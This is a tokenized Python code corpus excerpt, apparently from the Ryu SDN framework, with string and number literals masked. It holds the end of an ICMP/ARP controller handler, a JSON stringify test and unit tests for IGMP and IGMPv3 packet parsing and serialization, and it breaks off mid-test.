debug ( "<STR_LIT>" , src_ip , dst_ip ) <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> echo = icmp . echo ( id_ = <NUM_LIT> , seq = <NUM_LIT:1> ) <EOL> data = self . _echo_request ( echo ) <EOL> self . _send_msg ( dp , data ) <EOL> if p_icmp : <EOL> src = str ( netaddr . IPAddress ( p_ipv4 . src ) ) <EOL> dst = str ( netaddr . IPAddress ( p_ipv4 . dst ) ) <EOL> if p_icmp . type == icmp . ICMP_ECHO_REQUEST : <EOL> LOG . debug ( "<STR_LIT>" , src , dst ) <EOL> if p_ipv4 . dst == self . RYU_IP : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> echo = p_icmp . data <EOL> echo . data = bytearray ( echo . data ) <EOL> data = self . _echo_reply ( echo ) <EOL> self . _send_msg ( dp , data ) <EOL> elif p_icmp . type == icmp . ICMP_ECHO_REPLY : <EOL> LOG . debug ( "<STR_LIT>" , src , dst ) <EOL> @ handler . set_ev_cls ( dpset . EventDP , dpset . DPSET_EV_DISPATCHER ) <EOL> def handler_datapath ( self , ev ) : <EOL> if ev . enter : <EOL> dp = ev . dp <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> data = self . _garp ( ) <EOL> self . _send_msg ( dp , data ) </s>
<s> from __future__ import print_function <EOL> import base64 <EOL> import six <EOL> import unittest <EOL> from nose . tools import eq_ <EOL> from ryu . lib import stringify <EOL> class C1 ( stringify . StringifyMixin ) : <EOL> def __init__ ( self , a , c ) : <EOL> print ( "<STR_LIT>" % ( a , c ) ) <EOL> self . a = a <EOL> self . _b = '<STR_LIT:B>' <EOL> self . c = c <EOL> class Test_stringify ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_jsondict ( self ) : <EOL> if six . PY3 : <EOL> def b64encode ( s ) : <EOL> return base64 . b64encode ( s ) . decode ( '<STR_LIT:ascii>' ) <EOL> else : <EOL> b64encode = base64 . b64encode <EOL> j = { '<STR_LIT>' : { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } } <EOL> eq_ ( j [ '<STR_LIT>' ] [ '<STR_LIT:a>' ] , b64encode ( b'<STR_LIT>' ) ) <EOL> eq_ ( j [ '<STR_LIT>' ] [ '<STR_LIT:c>' ] , b64encode ( b'<STR_LIT>' ) ) <EOL> c = C1 ( a = b'<STR_LIT>' , c = b'<STR_LIT>' ) <EOL> c2 = C1 . from_jsondict ( j [ '<STR_LIT>' ] ) <EOL> eq_ ( c . __class__ , c2 . __class__ ) <EOL> eq_ ( c . __dict__ , c2 . __dict__ ) <EOL> eq_ ( j , c . to_jsondict ( ) ) <EOL> def test_jsondict2 ( self ) : <EOL> def my_encode ( x ) : <EOL> return x . lower ( ) <EOL> def my_decode ( x ) : <EOL> return x . upper ( ) <EOL> j = { '<STR_LIT>' : { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } } <EOL> eq_ ( j [ '<STR_LIT>' ] [ '<STR_LIT:a>' ] , my_encode ( '<STR_LIT>' ) ) <EOL> eq_ ( j [ '<STR_LIT>' ] [ '<STR_LIT:c>' ] , my_encode ( '<STR_LIT>' ) ) <EOL> c = C1 ( a = '<STR_LIT>' , c = '<STR_LIT>' ) <EOL> c2 = C1 . from_jsondict ( j [ '<STR_LIT>' ] , decode_string = my_decode ) <EOL> eq_ ( c . __class__ , c2 . __class__ ) <EOL> eq_ ( c . __dict__ , c2 . __dict__ ) <EOL> eq_ ( j , c . to_jsondict ( encode_string = my_encode ) ) </s>
<s> import unittest <EOL> import inspect <EOL> import logging <EOL> import six <EOL> from struct import pack , unpack_from , pack_into <EOL> from nose . tools import ok_ , eq_ , raises <EOL> from ryu . ofproto import ether <EOL> from ryu . ofproto import inet <EOL> from ryu . lib . packet . ethernet import ethernet <EOL> from ryu . lib . packet . ipv4 import ipv4 <EOL> from ryu . lib . packet . packet import Packet <EOL> from ryu . lib . packet . packet_utils import checksum <EOL> from ryu . lib import addrconv <EOL> from ryu . lib . packet . igmp import igmp <EOL> from ryu . lib . packet . igmp import igmpv3_query <EOL> from ryu . lib . packet . igmp import igmpv3_report <EOL> from ryu . lib . packet . igmp import igmpv3_report_group <EOL> from ryu . lib . packet . igmp import IGMP_TYPE_QUERY <EOL> from ryu . lib . packet . igmp import IGMP_TYPE_REPORT_V3 <EOL> from ryu . lib . packet . igmp import MODE_IS_INCLUDE <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class Test_igmp ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . msgtype = IGMP_TYPE_QUERY <EOL> self . maxresp = <NUM_LIT:100> <EOL> self . csum = <NUM_LIT:0> <EOL> self . address = '<STR_LIT>' <EOL> self . buf = pack ( igmp . _PACK_STR , self . msgtype , self . maxresp , <EOL> self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> self . g = igmp ( self . msgtype , self . maxresp , self . csum , <EOL> self . address ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def find_protocol ( self , pkt , name ) : <EOL> for p in pkt . protocols : <EOL> if p . protocol_name == name : <EOL> return p <EOL> def test_init ( self ) : <EOL> eq_ ( self . msgtype , self . g . msgtype ) <EOL> eq_ ( self . maxresp , self . g . maxresp ) <EOL> eq_ ( self . csum , self . g . csum ) <EOL> eq_ ( self . address , self . g . address ) <EOL> def test_parser ( self ) : <EOL> _res = self . g . parser ( self . 
buf ) <EOL> if type ( _res ) is tuple : <EOL> res = _res [ <NUM_LIT:0> ] <EOL> else : <EOL> res = _res <EOL> eq_ ( res . msgtype , self . msgtype ) <EOL> eq_ ( res . maxresp , self . maxresp ) <EOL> eq_ ( res . csum , self . csum ) <EOL> eq_ ( res . address , self . address ) <EOL> def test_serialize ( self ) : <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = self . g . serialize ( data , prev ) <EOL> res = unpack_from ( igmp . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . maxresp ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> def _build_igmp ( self ) : <EOL> dl_dst = '<STR_LIT>' <EOL> dl_src = '<STR_LIT>' <EOL> dl_type = ether . ETH_TYPE_IP <EOL> e = ethernet ( dl_dst , dl_src , dl_type ) <EOL> total_length = <NUM_LIT:20> + igmp . _MIN_LEN <EOL> nw_proto = inet . IPPROTO_IGMP <EOL> nw_dst = '<STR_LIT>' <EOL> nw_src = '<STR_LIT>' <EOL> i = ipv4 ( total_length = total_length , src = nw_src , dst = nw_dst , <EOL> proto = nw_proto ) <EOL> p = Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( i ) <EOL> p . add_protocol ( self . g ) <EOL> p . serialize ( ) <EOL> return p <EOL> def test_build_igmp ( self ) : <EOL> p = self . _build_igmp ( ) <EOL> e = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( e ) <EOL> eq_ ( e . ethertype , ether . ETH_TYPE_IP ) <EOL> i = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( i ) <EOL> eq_ ( i . proto , inet . IPPROTO_IGMP ) <EOL> g = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( g ) <EOL> eq_ ( g . msgtype , self . msgtype ) <EOL> eq_ ( g . maxresp , self . maxresp ) <EOL> eq_ ( g . csum , checksum ( self . buf ) ) <EOL> eq_ ( g . address , self . address ) <EOL> def test_to_string ( self ) : <EOL> igmp_values = { '<STR_LIT>' : repr ( self . msgtype ) , <EOL> '<STR_LIT>' : repr ( self . 
maxresp ) , <EOL> '<STR_LIT>' : repr ( self . csum ) , <EOL> '<STR_LIT:address>' : repr ( self . address ) } <EOL> _g_str = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( k , igmp_values [ k ] ) <EOL> for k , v in inspect . getmembers ( self . g ) <EOL> if k in igmp_values ] ) <EOL> g_str = '<STR_LIT>' % ( igmp . __name__ , _g_str ) <EOL> eq_ ( str ( self . g ) , g_str ) <EOL> eq_ ( repr ( self . g ) , g_str ) <EOL> @ raises ( Exception ) <EOL> def test_malformed_igmp ( self ) : <EOL> m_short_buf = self . buf [ <NUM_LIT:1> : igmp . _MIN_LEN ] <EOL> igmp . parser ( m_short_buf ) <EOL> def test_default_args ( self ) : <EOL> ig = igmp ( ) <EOL> buf = ig . serialize ( bytearray ( ) , None ) <EOL> res = unpack_from ( igmp . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> def test_json ( self ) : <EOL> jsondict = self . g . to_jsondict ( ) <EOL> g = igmp . from_jsondict ( jsondict [ '<STR_LIT>' ] ) <EOL> eq_ ( str ( self . g ) , str ( g ) ) <EOL> class Test_igmpv3_query ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . msgtype = IGMP_TYPE_QUERY <EOL> self . maxresp = <NUM_LIT:100> <EOL> self . csum = <NUM_LIT:0> <EOL> self . address = '<STR_LIT>' <EOL> self . s_flg = <NUM_LIT:0> <EOL> self . qrv = <NUM_LIT:2> <EOL> self . qqic = <NUM_LIT:10> <EOL> self . num = <NUM_LIT:0> <EOL> self . srcs = [ ] <EOL> self . s_qrv = self . s_flg << <NUM_LIT:3> | self . qrv <EOL> self . buf = pack ( igmpv3_query . _PACK_STR , self . msgtype , <EOL> self . maxresp , self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) , <EOL> self . s_qrv , self . qqic , self . num ) <EOL> self . g = igmpv3_query ( <EOL> self . msgtype , self . maxresp , self . csum , self . address , <EOL> self . s_flg , self . qrv , self . qqic , self . num , self . 
srcs ) <EOL> def setUp_with_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) <EOL> self . buf = pack ( igmpv3_query . _PACK_STR , self . msgtype , <EOL> self . maxresp , self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) , <EOL> self . s_qrv , self . qqic , self . num ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_query ( <EOL> self . msgtype , self . maxresp , self . csum , self . address , <EOL> self . s_flg , self . qrv , self . qqic , self . num , self . srcs ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def find_protocol ( self , pkt , name ) : <EOL> for p in pkt . protocols : <EOL> if p . protocol_name == name : <EOL> return p <EOL> def test_init ( self ) : <EOL> eq_ ( self . msgtype , self . g . msgtype ) <EOL> eq_ ( self . maxresp , self . g . maxresp ) <EOL> eq_ ( self . csum , self . g . csum ) <EOL> eq_ ( self . address , self . g . address ) <EOL> eq_ ( self . s_flg , self . g . s_flg ) <EOL> eq_ ( self . qrv , self . g . qrv ) <EOL> eq_ ( self . qqic , self . g . qqic ) <EOL> eq_ ( self . num , self . g . num ) <EOL> eq_ ( self . srcs , self . g . srcs ) <EOL> def test_init_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_init ( ) <EOL> def test_parser ( self ) : <EOL> _res = self . g . parser ( self . buf ) <EOL> if type ( _res ) is tuple : <EOL> res = _res [ <NUM_LIT:0> ] <EOL> else : <EOL> res = _res <EOL> eq_ ( res . msgtype , self . msgtype ) <EOL> eq_ ( res . maxresp , self . maxresp ) <EOL> eq_ ( res . csum , self . csum ) <EOL> eq_ ( res . address , self . address ) <EOL> eq_ ( res . s_flg , self . s_flg ) <EOL> eq_ ( res . qrv , self . qrv ) <EOL> eq_ ( res . qqic , self . qqic ) <EOL> eq_ ( res . num , self . num ) <EOL> eq_ ( res . srcs , self . srcs ) <EOL> def test_parser_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . 
test_parser ( ) <EOL> def test_serialize ( self ) : <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = self . g . serialize ( data , prev ) <EOL> res = unpack_from ( igmpv3_query . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . maxresp ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( res [ <NUM_LIT:4> ] , self . s_qrv ) <EOL> eq_ ( res [ <NUM_LIT:5> ] , self . qqic ) <EOL> eq_ ( res [ <NUM_LIT:6> ] , self . num ) <EOL> def test_serialize_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = self . g . serialize ( data , prev ) <EOL> res = unpack_from ( igmpv3_query . _PACK_STR , six . binary_type ( buf ) ) <EOL> ( src1 , src2 , src3 ) = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , <EOL> igmpv3_query . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . maxresp ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( res [ <NUM_LIT:4> ] , self . s_qrv ) <EOL> eq_ ( res [ <NUM_LIT:5> ] , self . qqic ) <EOL> eq_ ( res [ <NUM_LIT:6> ] , self . num ) <EOL> eq_ ( src1 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( src2 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( src3 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:2> ] ) ) <EOL> def _build_igmp ( self ) : <EOL> dl_dst = '<STR_LIT>' <EOL> dl_src = '<STR_LIT>' <EOL> dl_type = ether . ETH_TYPE_IP <EOL> e = ethernet ( dl_dst , dl_src , dl_type ) <EOL> total_length = len ( ipv4 ( ) ) + len ( self . g ) <EOL> nw_proto = inet . 
IPPROTO_IGMP <EOL> nw_dst = '<STR_LIT>' <EOL> nw_src = '<STR_LIT>' <EOL> i = ipv4 ( total_length = total_length , src = nw_src , dst = nw_dst , <EOL> proto = nw_proto , ttl = <NUM_LIT:1> ) <EOL> p = Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( i ) <EOL> p . add_protocol ( self . g ) <EOL> p . serialize ( ) <EOL> return p <EOL> def test_build_igmp ( self ) : <EOL> p = self . _build_igmp ( ) <EOL> e = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( e ) <EOL> eq_ ( e . ethertype , ether . ETH_TYPE_IP ) <EOL> i = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( i ) <EOL> eq_ ( i . proto , inet . IPPROTO_IGMP ) <EOL> g = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( g ) <EOL> eq_ ( g . msgtype , self . msgtype ) <EOL> eq_ ( g . maxresp , self . maxresp ) <EOL> eq_ ( g . csum , checksum ( self . buf ) ) <EOL> eq_ ( g . address , self . address ) <EOL> eq_ ( g . s_flg , self . s_flg ) <EOL> eq_ ( g . qrv , self . qrv ) <EOL> eq_ ( g . qqic , self . qqic ) <EOL> eq_ ( g . num , self . num ) <EOL> eq_ ( g . srcs , self . srcs ) <EOL> def test_build_igmp_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_build_igmp ( ) <EOL> def test_to_string ( self ) : <EOL> igmp_values = { '<STR_LIT>' : repr ( self . msgtype ) , <EOL> '<STR_LIT>' : repr ( self . maxresp ) , <EOL> '<STR_LIT>' : repr ( self . csum ) , <EOL> '<STR_LIT:address>' : repr ( self . address ) , <EOL> '<STR_LIT>' : repr ( self . s_flg ) , <EOL> '<STR_LIT>' : repr ( self . qrv ) , <EOL> '<STR_LIT>' : repr ( self . qqic ) , <EOL> '<STR_LIT>' : repr ( self . num ) , <EOL> '<STR_LIT>' : repr ( self . srcs ) } <EOL> _g_str = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( k , igmp_values [ k ] ) <EOL> for k , v in inspect . getmembers ( self . g ) <EOL> if k in igmp_values ] ) <EOL> g_str = '<STR_LIT>' % ( igmpv3_query . __name__ , _g_str ) <EOL> eq_ ( str ( self . g ) , g_str ) <EOL> eq_ ( repr ( self . 
g ) , g_str ) <EOL> def test_to_string_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_to_string ( ) <EOL> @ raises ( Exception ) <EOL> def test_num_larger_than_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) + <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_query . _PACK_STR , self . msgtype , <EOL> self . maxresp , self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) , <EOL> self . s_qrv , self . qqic , self . num ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_query ( <EOL> self . msgtype , self . maxresp , self . csum , self . address , <EOL> self . s_flg , self . qrv , self . qqic , self . num , self . srcs ) <EOL> self . test_parser ( ) <EOL> @ raises ( Exception ) <EOL> def test_num_smaller_than_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) - <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_query . _PACK_STR , self . msgtype , <EOL> self . maxresp , self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) , <EOL> self . s_qrv , self . qqic , self . num ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_query ( <EOL> self . msgtype , self . maxresp , self . csum , self . address , <EOL> self . s_flg , self . qrv , self . qqic , self . num , self . srcs ) <EOL> self . test_parser ( ) <EOL> def test_default_args ( self ) : <EOL> prev = ipv4 ( proto = inet . IPPROTO_IGMP ) <EOL> g = igmpv3_query ( ) <EOL> prev . serialize ( g , None ) <EOL> buf = g . serialize ( bytearray ( ) , prev ) <EOL> res = unpack_from ( igmpv3_query . _PACK_STR , six . 
binary_type ( buf ) ) <EOL> buf = bytearray ( buf ) <EOL> pack_into ( '<STR_LIT>' , buf , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , IGMP_TYPE_QUERY ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:100> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> eq_ ( res [ <NUM_LIT:4> ] , <NUM_LIT:2> ) <EOL> eq_ ( res [ <NUM_LIT:5> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:6> ] , <NUM_LIT:0> ) <EOL> prev = ipv4 ( proto = inet . IPPROTO_IGMP ) <EOL> srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> g = igmpv3_query ( srcs = srcs ) <EOL> prev . serialize ( g , None ) <EOL> buf = g . serialize ( bytearray ( ) , prev ) <EOL> res = unpack_from ( igmpv3_query . _PACK_STR , six . binary_type ( buf ) ) <EOL> buf = bytearray ( buf ) <EOL> pack_into ( '<STR_LIT>' , buf , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , IGMP_TYPE_QUERY ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:100> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> eq_ ( res [ <NUM_LIT:4> ] , <NUM_LIT:2> ) <EOL> eq_ ( res [ <NUM_LIT:5> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:6> ] , len ( srcs ) ) <EOL> res = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , igmpv3_query . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:2> ] ) ) <EOL> def test_json ( self ) : <EOL> jsondict = self . g . to_jsondict ( ) <EOL> g = igmpv3_query . from_jsondict ( jsondict [ '<STR_LIT>' ] ) <EOL> eq_ ( str ( self . g ) , str ( g ) ) <EOL> def test_json_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_json ( ) <EOL> class Test_igmpv3_report ( unittest . 
TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . msgtype = IGMP_TYPE_REPORT_V3 <EOL> self . csum = <NUM_LIT:0> <EOL> self . record_num = <NUM_LIT:0> <EOL> self . records = [ ] <EOL> self . buf = pack ( igmpv3_report . _PACK_STR , self . msgtype , <EOL> self . csum , self . record_num ) <EOL> self . g = igmpv3_report ( <EOL> self . msgtype , self . csum , self . record_num , self . records ) <EOL> def setUp_with_records ( self ) : <EOL> self . record1 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . record2 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . record3 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:0> , '<STR_LIT>' , [ ] , b'<STR_LIT>' ) <EOL> self . record4 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:2> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> self . records = [ self . record1 , self . record2 , self . record3 , <EOL> self . record4 ] <EOL> self . record_num = len ( self . records ) <EOL> self . buf = pack ( igmpv3_report . _PACK_STR , self . msgtype , <EOL> self . csum , self . record_num ) <EOL> self . buf += self . record1 . serialize ( ) <EOL> self . buf += self . record2 . serialize ( ) <EOL> self . buf += self . record3 . serialize ( ) <EOL> self . buf += self . record4 . serialize ( ) <EOL> self . g = igmpv3_report ( <EOL> self . msgtype , self . csum , self . record_num , self . records ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def find_protocol ( self , pkt , name ) : <EOL> for p in pkt . protocols : <EOL> if p . protocol_name == name : <EOL> return p <EOL> def test_init ( self ) : <EOL> eq_ ( self . msgtype , self . g . msgtype ) <EOL> eq_ ( self . csum , self . g . csum ) <EOL> eq_ ( self . record_num , self . g . record_num ) <EOL> eq_ ( self . records , self . g . 
records ) <EOL> def test_init_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . test_init ( ) <EOL> def test_parser ( self ) : <EOL> _res = self . g . parser ( six . binary_type ( self . buf ) ) <EOL> if type ( _res ) is tuple : <EOL> res = _res [ <NUM_LIT:0> ] <EOL> else : <EOL> res = _res <EOL> eq_ ( res . msgtype , self . msgtype ) <EOL> eq_ ( res . csum , self . csum ) <EOL> eq_ ( res . record_num , self . record_num ) <EOL> eq_ ( repr ( res . records ) , repr ( self . records ) ) <EOL> def test_parser_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . test_parser ( ) <EOL> def test_serialize ( self ) : <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = self . g . serialize ( data , prev ) <EOL> res = unpack_from ( igmpv3_report . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . record_num ) <EOL> def test_serialize_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = six . binary_type ( self . g . serialize ( data , prev ) ) <EOL> res = unpack_from ( igmpv3_report . _PACK_STR , buf ) <EOL> offset = igmpv3_report . _MIN_LEN <EOL> rec1 = igmpv3_report_group . parser ( buf [ offset : ] ) <EOL> offset += len ( rec1 ) <EOL> rec2 = igmpv3_report_group . parser ( buf [ offset : ] ) <EOL> offset += len ( rec2 ) <EOL> rec3 = igmpv3_report_group . parser ( buf [ offset : ] ) <EOL> offset += len ( rec3 ) <EOL> rec4 = igmpv3_report_group . parser ( buf [ offset : ] ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . record_num ) <EOL> eq_ ( repr ( rec1 ) , repr ( self . record1 ) ) <EOL> eq_ ( repr ( rec2 ) , repr ( self . record2 ) ) <EOL> eq_ ( repr ( rec3 ) , repr ( self . 
record3 ) ) <EOL> eq_ ( repr ( rec4 ) , repr ( self . record4 ) ) <EOL> def _build_igmp ( self ) : <EOL> dl_dst = '<STR_LIT>' <EOL> dl_src = '<STR_LIT>' <EOL> dl_type = ether . ETH_TYPE_IP <EOL> e = ethernet ( dl_dst , dl_src , dl_type ) <EOL> total_length = len ( ipv4 ( ) ) + len ( self . g ) <EOL> nw_proto = inet . IPPROTO_IGMP <EOL> nw_dst = '<STR_LIT>' <EOL> nw_src = '<STR_LIT>' <EOL> i = ipv4 ( total_length = total_length , src = nw_src , dst = nw_dst , <EOL> proto = nw_proto , ttl = <NUM_LIT:1> ) <EOL> p = Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( i ) <EOL> p . add_protocol ( self . g ) <EOL> p . serialize ( ) <EOL> return p <EOL> def test_build_igmp ( self ) : <EOL> p = self . _build_igmp ( ) <EOL> e = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( e ) <EOL> eq_ ( e . ethertype , ether . ETH_TYPE_IP ) <EOL> i = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( i ) <EOL> eq_ ( i . proto , inet . IPPROTO_IGMP ) <EOL> g = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( g ) <EOL> eq_ ( g . msgtype , self . msgtype ) <EOL> eq_ ( g . csum , checksum ( self . buf ) ) <EOL> eq_ ( g . record_num , self . record_num ) <EOL> eq_ ( g . records , self . records ) <EOL> def test_build_igmp_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . test_build_igmp ( ) <EOL> def test_to_string ( self ) : <EOL> igmp_values = { '<STR_LIT>' : repr ( self . msgtype ) , <EOL> '<STR_LIT>' : repr ( self . csum ) , <EOL> '<STR_LIT>' : repr ( self . record_num ) , <EOL> '<STR_LIT>' : repr ( self . records ) } <EOL> _g_str = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( k , igmp_values [ k ] ) <EOL> for k , v in inspect . getmembers ( self . g ) <EOL> if k in igmp_values ] ) <EOL> g_str = '<STR_LIT>' % ( igmpv3_report . __name__ , _g_str ) <EOL> eq_ ( str ( self . g ) , g_str ) <EOL> eq_ ( repr ( self . g ) , g_str ) <EOL> def test_to_string_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . 
test_to_string ( ) <EOL> @ raises ( Exception ) <EOL> def test_record_num_larger_than_records ( self ) : <EOL> self . record1 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . record2 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . record3 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:0> , '<STR_LIT>' , [ ] , b'<STR_LIT>' ) <EOL> self . record4 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> self . records = [ self . record1 , self . record2 , self . record3 , <EOL> self . record4 ] <EOL> self . record_num = len ( self . records ) + <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report . _PACK_STR , self . msgtype , <EOL> self . csum , self . record_num ) <EOL> self . 